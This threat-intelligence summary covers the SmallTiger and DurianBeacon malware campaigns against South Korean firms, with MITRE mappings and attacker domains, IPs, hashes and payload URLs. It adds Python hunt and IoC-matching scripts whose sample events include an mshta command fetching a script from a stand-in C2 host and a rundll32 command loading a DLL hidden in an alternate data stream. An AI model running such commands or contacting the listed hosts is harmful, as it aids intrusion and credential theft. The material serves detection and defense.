ASEC reports active use of the SmallTiger malware in attacks against South Korean businesses, with targets including defense contractors, auto parts manufacturers, and semiconductor makers. The operation is linked to Kimsuky and Andariel and evolved from DurianBeacon to SmallTiger; it abuses updater software for internal propagation, drops DLL-based downloaders, and talks to its C2 server over TLS. #SmallTiger #DurianBeacon #Kimsuky #Andariel #WebBrowserPassView
Keypoints
- The campaigns target South Korean defense contractors, automobile parts, and semiconductor manufacturers; inside the network the malware is spread by abusing a software updater.
- DurianBeacon was used in the November 2023 wave and later superseded by SmallTiger in February 2024; the Go-based DurianBeacon communicates over SSL/TLS to its C2 server.
- Initial access details are unclear, but the attacker propagated malware during internal movement, using techniques associated with the Andariel group in some stages.
- SmallTiger Case #1 involved DLL-based downloaders, memory-resident payloads, credential dumping (Mimikatz/ProcDump), and browser credential stealer components (NirSoft WebBrowserPassView).
- SmallTiger Case #2 employed mshta to fetch JavaScript from C2, created payloads in ADS (Alternate Data Stream) areas, and used rundll32 to execute them; GitHub hosted payloads in May 2024.
- Overall indicators include multiple MD5s, domain/IPs, and download URLs tied to DurianBeacon and SmallTiger, plus C2 infrastructure across various KR domains and IPs.
- Recommendations stress avoiding suspicious mail attachments and links, keeping the OS and browsers patched, and keeping security software up to date and its alerts monitored.
MITRE Techniques
- [T1059.001] PowerShell: PowerShell commands are executed during the operation.
  Quoted: "Execute PowerShell commands"
- [T1218.005] Mshta: mshta fetches a malicious JavaScript from the C2 server; the script writes a payload into an alternate data stream and launches it with rundll32.
  Quoted: "download a malicious JavaScript from the C&C server using the mshta command and runs it."
- [T1218.011] Rundll32: rundll32 is used to execute the payload stored in the ADS.
  Quoted: "…and runs it using rundll32."
- [T1055] Process Injection: DurianBeacon loads a DLL it dropped under %SystemDirectory% and calls its RyXmqIUMXViyw6Uvkf() export. (The quoted behaviour is a load into the beacon's own process, which is closer to T1129 Shared Modules than to injection into another process; the mapping is kept as the source gives it.)
  Quoted: "loads a DLL created in the '%SystemDirectory%OGPWm4uRZ0CAkHZ9oc0FcEpj86LSNmZ5.dll' path and calls the RyXmqIUMXViyw6Uvkf() function."
- [T1027] Obfuscated/Compressed Files and Information: the dropper decrypts three files embedded in its resource section and executes them in memory rather than writing plaintext payloads to disk.
  Quoted: "decrypts three files that exist in the resource and decrypts the files to execute them inside the memory."
- [T1082] System Information Discovery: DurianBeacon reports the infected host's IP address, user name, desktop (host) name, architecture, and file names before waiting for commands.
  Quoted: "sends the infected system's IP information, user name, desktop name, architecture, and file names before awaiting commands."
- [T1083] File and Directory Discovery: a directory-listing command is among the supported backdoor commands.
  Quoted: "Look up directory"
- [T1105] Ingress Tool Transfer: the backdoor downloads a payload and executes it in memory.
  Quoted: "download a payload and executes it inside the memory."
- [T1041] Exfiltration Over C2 Channel: a file-upload command sends files back over the C2 channel.
  Quoted: "Upload files"
- [T1090] Proxy: a SOCKS proxy command lets the operator relay traffic through the infected host.
  Quoted: "Socks Proxy"
- [T1573.002] Encrypted Channel (SSL/TLS): C2 communication is wrapped in SSL/TLS.
  Quoted: "uses the SSL protocol to communicate with the C&C server."
- [T1003.001] OS Credential Dumping, LSASS Memory: Mimikatz was used and LSASS memory was dumped with ProcDump to recover credentials.
  Quoted: "dumped the memory of the LSASS process using the ProcDump tool to hijack the infected system's credentials."
- [T1555.003] Credentials from Web Browsers: NirSoft's WebBrowserPassView was run to harvest saved browser credentials.
  Quoted: "the memory of NirSoft's WebBrowserPassView and web browser was also discovered…"
- [T1021.001] Remote Desktop Protocol: the MultiRDP tool patches the running Remote Desktop service in memory so that several users can be connected over RDP at once.
  Quoted: "patches the memory of the currently running remote desktop service so that multiple users can connect with remote desktop protocol (RDP)."
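The Case #2 chain above (mshta pulling remote JavaScript, a payload written into an ADS, rundll32 loading it) is what a hunt query should key on. The following is an added example, not code from the ASEC report: two detection rules applied to constructed Sysmon-style process-creation records reduced to dicts. Only the ADS path C:\Users\Public\printsys.dll:mdata is taken from the page; the C2 host, the export name Start, and the benign control records are assumptions for illustration.

```python
"""Hunt for the mshta -> ADS -> rundll32 execution chain in process-creation events.

Added example; the records below are constructed in the shape of Sysmon
Event ID 1 (ProcessCreate) reduced to a dict, not telemetry from the report.
"""
import re
from typing import Optional

URL_RE = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)

# Constructed sample events. Only the ADS path C:\Users\Public\printsys.dll:mdata
# comes from the page; the C2 host, the export name "Start" and the benign
# records are assumptions for illustration.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 688, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://c2.example.invalid/stage.hta"},
    {"pid": 4388, "ppid": 4120, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\Public\printsys.dll:mdata,Start"},
    {"pid": 5000, "ppid": 688, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"pid": 5100, "ppid": 700, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
]


def has_ads(path: str) -> bool:
    """True if a Windows path names an alternate data stream (file.ext:stream).

    The drive-letter colon is stripped first so C:\\x.dll is not a false hit, and
    URLs are excluded because their scheme colon is not a stream separator.
    """
    if SCHEME_RE.match(path):
        return False
    body = path[2:] if re.match(r"^[A-Za-z]:", path) else path
    name = body.rsplit("\\", 1)[-1]          # last path component only
    return ":" in name.strip(":")            # interior colon => file:stream


def rundll32_module(cmdline: str) -> Optional[str]:
    """Extract the module argument from 'rundll32.exe <module>,<export> [args]'."""
    parts = cmdline.split(None, 1)
    if len(parts) < 2:
        return None
    return parts[1].split(",", 1)[0].strip().strip('"')


def flag_mshta(ev: dict) -> Optional[dict]:
    """T1218.005: mshta pulling its HTA/JavaScript from a remote URL."""
    if not ev["image"].lower().endswith("\\mshta.exe"):
        return None
    m = URL_RE.search(ev["cmdline"])
    if not m:
        return None
    return {"pid": ev["pid"], "technique": "T1218.005",
            "reason": f"mshta loaded remote content from {m.group(0)}"}


def flag_rundll32_ads(ev: dict) -> Optional[dict]:
    """T1218.011: rundll32 loading its module from an alternate data stream."""
    if not ev["image"].lower().endswith("\\rundll32.exe"):
        return None
    module = rundll32_module(ev["cmdline"])
    if not module or not has_ads(module):
        return None
    return {"pid": ev["pid"], "technique": "T1218.011",
            "reason": f"rundll32 module is an ADS: {module}"}


def hunt(events: list) -> list:
    """Apply both rules; a hit whose parent process is mshta completes the chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        for rule in (flag_mshta, flag_rundll32_ads):
            hit = rule(ev)
            if hit is None:
                continue
            parent = by_pid.get(ev["ppid"])
            hit["chain"] = bool(parent and parent["image"].lower().endswith("\\mshta.exe"))
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The ADS check is deliberately applied to the module argument only: a colon in a URL passed to mshta is a scheme separator, and the drive-letter colon is stripped before testing, so neither produces a false positive. The benign rundll32 record (shell32.dll,Control_RunDLL) and the mshta call on a local .hta file are left unflagged.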
Indicators of Compromise
- [IP] related Meterpreter/Kimsuky infrastructure: 104.168.145.83:993, 38.110.1.69:993, and further IPs listed in the report
- [Domain] related KR infrastructure: www.yah00.o-r.kr:53, www.aslark.kro.kr:1433, www.aslark1.kro.kr:1433, www.lazor.kro.kr:443, and other KR domains listed in the report
- [Domain] SmallTiger C2: www.navver.o-r.kr:53, w3.navver.o-r.kr:53, www.kepir.p-e.kr:53, www.kepir.p-e.kr:1521
- [MD5]: 48d53985cefb9029feb349bcd514c444, d6a38ffdbac241d69674fb142a420740, 232046aff635f1a5d81e415ef64649b7
- [MD5]: e582bd909800e87952eb1f206a279e47, 2a60348bd0fb2b5fadeb2a691c921370, 5e7acd7bf25dd7ef69bd76cbf7e96819
- [File]: j******n.exe (SmallTiger downloader/dropper), printsys.dll, mNyKQBP3vV4uX (ADS payload)
- [File]: DurianBeacon dropper (m.dat), DurianBeacon loader (mozillasvcone.dll), DurianBeacon loader (c0FcEpj86LSNmZ5.dll)
- [URLs]: hxxp://my.shoping.kro[.]kr/setting.dat, hxxp://my.shoping.kro[.]kr/m.dat, hxxp://my.shoping.kro[.]kr/ng.db
- [ADS/Path]: C:\Users\Public\printsys.dll:mdata (payload location in the alternate data stream)
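Two things matter when turning the list above into a network search: the indicators are published defanged (hxxp, [.]) and have to be refanged before matching, and the C2 endpoints sit on ports normally carrying DNS (53), MSSQL (1433), Oracle (1521) and IMAPS (993), so the host and port together are the key rather than the host alone. The following is an added example, not code from the ASEC report: a matcher that refangs the indicators exactly as they appear on this page and runs them over constructed key=value firewall/proxy records. The log format and the log lines are assumptions.

```python
"""Match the page's defanged network indicators against key=value network logs.

Added example; the log lines are constructed, not from the ASEC report.
"""
from urllib.parse import urlsplit

# Indicators exactly as published on this page (defanged where the page defangs them).
PAGE_INDICATORS = [
    "www.navver.o-r.kr:53", "w3.navver.o-r.kr:53",
    "www.kepir.p-e.kr:53", "www.kepir.p-e.kr:1521",
    "www.yah00.o-r.kr:53", "www.aslark.kro.kr:1433",
    "www.aslark1.kro.kr:1433", "www.lazor.kro.kr:443",
    "104.168.145.83:993", "38.110.1.69:993",
    "hxxp://my.shoping.kro[.]kr/setting.dat",
    "hxxp://my.shoping.kro[.]kr/m.dat",
    "hxxp://my.shoping.kro[.]kr/ng.db",
]

# Constructed firewall/proxy records (assumed format: timestamp, then key=value fields).
SAMPLE_LOGS = [
    "2024-05-02T10:11:12Z src=10.1.2.3 dst=104.168.145.83 dport=993 proto=tcp",
    "2024-05-02T10:12:00Z src=10.1.2.3 host=www.navver.o-r.kr dport=53 proto=tcp bytes=4820",
    "2024-05-02T10:12:30Z src=10.1.2.3 host=www.navver.o-r.kr dport=443 proto=tcp",
    "2024-05-02T10:13:00Z src=10.1.2.9 url=http://my.shoping.kro.kr/m.dat status=200",
    "2024-05-02T10:14:00Z src=10.1.2.9 dst=8.8.8.8 dport=53 proto=udp",
]


def refang(ioc: str) -> str:
    """Undo the common defanging conventions (hxxp, [.], [:]) used in published IoCs."""
    return ioc.strip().replace("hxxp", "http").replace("[.]", ".").replace("[:]", ":")


def parse_indicator(ioc: str):
    """Return ('url', scheme://host:port/path) or ('endpoint', (host, port-or-None))."""
    s = refang(ioc)
    if s.lower().startswith(("http://", "https://")):
        u = urlsplit(s)
        port = u.port or (443 if u.scheme.lower() == "https" else 80)
        return "url", f"{u.scheme.lower()}://{u.hostname}:{port}{u.path}"
    host, _, port = s.rpartition(":")
    if port.isdigit():
        return "endpoint", (host.lower(), int(port))
    return "endpoint", (s.lower(), None)      # bare host or IP without a port


def parse_log_line(line: str) -> dict:
    """Split 'k=v k=v' records into a dict; tokens without '=' (the timestamp) are dropped."""
    return dict(tok.split("=", 1) for tok in line.split() if "=" in tok)


def match_logs(lines, indicators):
    """Return (line_number, matched_indicator) for every log line touching a listed IoC."""
    endpoints, urls = set(), set()
    for ioc in indicators:
        kind, value = parse_indicator(ioc)
        (urls if kind == "url" else endpoints).add(value)
    hits = []
    for n, line in enumerate(lines, 1):
        f = parse_log_line(line)
        host = (f.get("host") or f.get("dst") or "").lower()
        port = int(f["dport"]) if f.get("dport", "").isdigit() else None
        # Host+port is the key: the same host on another port is not a listed endpoint.
        if host and ((host, port) in endpoints or (host, None) in endpoints):
            hits.append((n, f"{host}:{port}"))
        if "url" in f and parse_indicator(f["url"])[1] in urls:
            hits.append((n, f["url"]))
    return hits


if __name__ == "__main__":
    for n, ioc in match_logs(SAMPLE_LOGS, PAGE_INDICATORS):
        print(f"line {n}: {ioc}")
```

The third sample line (www.navver.o-r.kr on 443) is intentionally not reported: the page lists that host only on port 53, and a TCP session to a non-resolver on port 53 is the behaviour worth surfacing. Host names in real logs come from proxy or DNS telemetry; a pure flow log will only match the IP-based entries.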
Read more: https://asec.ahnlab.com/en/66546/